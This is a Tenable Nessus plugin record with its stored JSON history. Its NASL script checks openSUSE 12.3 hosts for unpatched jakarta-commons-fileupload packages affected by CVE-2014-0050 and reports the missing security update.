ID OPENSUSE-2014-297.NASL
Type nessus
Reporter Tenable
Modified 2015-11-06T00:00:00
Description
This jakarta-commons-fileupload update fixes the follwoing security and non security issues :
-
bnc#862781: Fixed buffer overflow and resulting DoS (CVE-2014-0050).
-
Removed gcj part and deprecated macros.
-
Moved from jpackage-utils to javapackage-tools.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2014-297.
#
# The text description of this plugin is (C) SUSE LLC.
#
include("compat.inc");
if (description)
{
script_id(75324);
script_version("$Revision: 1.3 $");
script_cvs_date("$Date: 2015/11/06 14:51:23 $");
script_cve_id("CVE-2014-0050");
script_bugtraq_id(65400);
script_name(english:"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)");
script_summary(english:"Check for the openSUSE-2014-297 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This jakarta-commons-fileupload update fixes the follwoing security
and non security issues :
- bnc#862781: Fixed buffer overflow and resulting DoS
(CVE-2014-0050).
- Removed gcj part and deprecated macros.
- Moved from jpackage-utils to javapackage-tools."
);
script_set_attribute(
attribute:"see_also",
value:"http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=862781"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected jakarta-commons-fileupload packages."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:12.3");
script_set_attribute(attribute:"patch_publication_date", value:"2014/04/04");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE12\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "12.3", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if ( rpm_check(release:"SUSE12.3", reference:"jakarta-commons-fileupload-1.1.1-114.8.1") ) flag++;
if ( rpm_check(release:"SUSE12.3", reference:"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1") ) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc");
}
{"id": "OPENSUSE-2014-297.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)", "description": "This jakarta-commons-fileupload update fixes the follwoing security and non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.", "published": "2014-06-13T00:00:00", "modified": "2015-11-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=75324", "reporter": "Tenable", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=862781", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html"], "cvelist": ["CVE-2014-0050"], "type": "nessus", "lastseen": "2018-09-01T23:32:36", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-0050"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This jakarta-commons-fileupload update fixes the follwoing security and non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.", "edition": 1, "enchantments": {}, "hash": "2a6c3f956f857bc1c2c792f0e8f73e381e0e476cf93188f871658f52dca7b9cf", "hashmap": [{"hash": "411b0fa39bff23a941ddefc879e1846b", "key": "pluginID"}, {"hash": "27983007c4745c615e545aa1502257bb", "key": "title"}, {"hash": "77dbfcbe2b53e0253f64899bb47222b6", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8d995ded238241a139db6901b8f16498", "key": "sourceData"}, {"hash": "4f7c0531be36b3474059231480deefc2", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "0e00f0441018f43ad22bef615ff4cfd5", "key": "href"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "8ecec58654ba061c199813977f60e3e1", "key": "modified"}, {"hash": "77a0b738c0c41ebcffc70090b07ebffa", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75324", "id": "OPENSUSE-2014-297.NASL", "lastseen": "2016-09-26T17:23:01", "modified": "2015-11-06T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "75324", "published": "2014-06-13T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=862781", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-297.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75324);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)\");\n script_summary(english:\"Check for the openSUSE-2014-297 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-1.1.1-114.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc"], "cvelist": ["CVE-2014-0050"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This jakarta-commons-fileupload update fixes the follwoing security and non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ec0b790bbc0fbfd7dd1fd37bd42b8a1da5e9a7a906b2cc0f4e5e32f03962896c", "hashmap": [{"hash": "411b0fa39bff23a941ddefc879e1846b", "key": "pluginID"}, {"hash": "27983007c4745c615e545aa1502257bb", "key": "title"}, {"hash": "77dbfcbe2b53e0253f64899bb47222b6", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8d995ded238241a139db6901b8f16498", "key": "sourceData"}, {"hash": "4f7c0531be36b3474059231480deefc2", "key": "references"}, {"hash": "0e00f0441018f43ad22bef615ff4cfd5", "key": "href"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8ecec58654ba061c199813977f60e3e1", "key": "modified"}, {"hash": "77a0b738c0c41ebcffc70090b07ebffa", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "4ff0bdc59ab80841f6d5ce8ed24c1eb3", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75324", "id": "OPENSUSE-2014-297.NASL", "lastseen": "2018-08-30T19:29:34", "modified": "2015-11-06T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "75324", "published": "2014-06-13T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=862781", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-297.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75324);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)\");\n script_summary(english:\"Check for the openSUSE-2014-297 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-1.1.1-114.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:29:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc"], "cvelist": ["CVE-2014-0050"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This jakarta-commons-fileupload update fixes the follwoing security and non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "972cb68def654cd558975c9b0b154474add739cf3a24cdcb063dca9fa6cd4438", "hashmap": [{"hash": "411b0fa39bff23a941ddefc879e1846b", "key": "pluginID"}, {"hash": "27983007c4745c615e545aa1502257bb", "key": "title"}, {"hash": "77dbfcbe2b53e0253f64899bb47222b6", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8d995ded238241a139db6901b8f16498", "key": "sourceData"}, {"hash": "4f7c0531be36b3474059231480deefc2", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "0e00f0441018f43ad22bef615ff4cfd5", "key": "href"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "8ecec58654ba061c199813977f60e3e1", "key": "modified"}, {"hash": "77a0b738c0c41ebcffc70090b07ebffa", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "4ff0bdc59ab80841f6d5ce8ed24c1eb3", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75324", "id": "OPENSUSE-2014-297.NASL", "lastseen": "2017-10-29T13:32:49", "modified": "2015-11-06T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "75324", "published": "2014-06-13T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=862781", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-297.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75324);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)\");\n script_summary(english:\"Check for the openSUSE-2014-297 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-1.1.1-114.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:32:49"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "4ff0bdc59ab80841f6d5ce8ed24c1eb3"}, {"key": "cvelist", "hash": "77a0b738c0c41ebcffc70090b07ebffa"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "77dbfcbe2b53e0253f64899bb47222b6"}, {"key": "href", "hash": "0e00f0441018f43ad22bef615ff4cfd5"}, {"key": "modified", "hash": "8ecec58654ba061c199813977f60e3e1"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "411b0fa39bff23a941ddefc879e1846b"}, {"key": "published", "hash": "02fcc0c238d215158fbaabb854c5b3df"}, {"key": "references", "hash": "4f7c0531be36b3474059231480deefc2"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "8d995ded238241a139db6901b8f16498"}, {"key": "title", "hash": "27983007c4745c615e545aa1502257bb"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "972cb68def654cd558975c9b0b154474add739cf3a24cdcb063dca9fa6cd4438", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-297.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75324);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)\");\n script_summary(english:\"Check for the openSUSE-2014-297 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-1.1.1-114.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "75324", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc"]}
